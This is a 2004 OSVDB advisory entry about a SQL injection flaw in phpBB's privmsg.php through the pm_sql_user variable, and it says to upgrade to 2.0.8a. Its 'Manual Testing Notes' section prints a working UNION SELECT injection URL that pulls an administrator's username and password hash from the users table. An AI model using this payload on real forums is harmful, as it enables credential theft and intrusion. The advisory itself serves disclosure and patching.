phpBB privmsg.php pm_sql_user Variable SQL Injection

2004-03-29T08:43:01
ID OSVDB:4644
Type osvdb
Reporter Janek Vind "waraxe"(come2waraxe@yahoo.com)
Modified 2004-03-29T08:43:01

Description

Vulnerability Description

phpBB contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the "pm_sql_user" variable in the "privmsg.php" module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Solution Description

Upgrade to version 2.0.8a or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

phpBB contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the "pm_sql_user" variable in the "privmsg.php" module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Manual Testing Notes

http://[victim]/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=- 99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullFROM phpbb_users WHERE user_level=1 LIMIT 1/*

References:

Vendor Specific Solution URL: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=185180 Secunia Advisory ID:11229 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-03/1341.html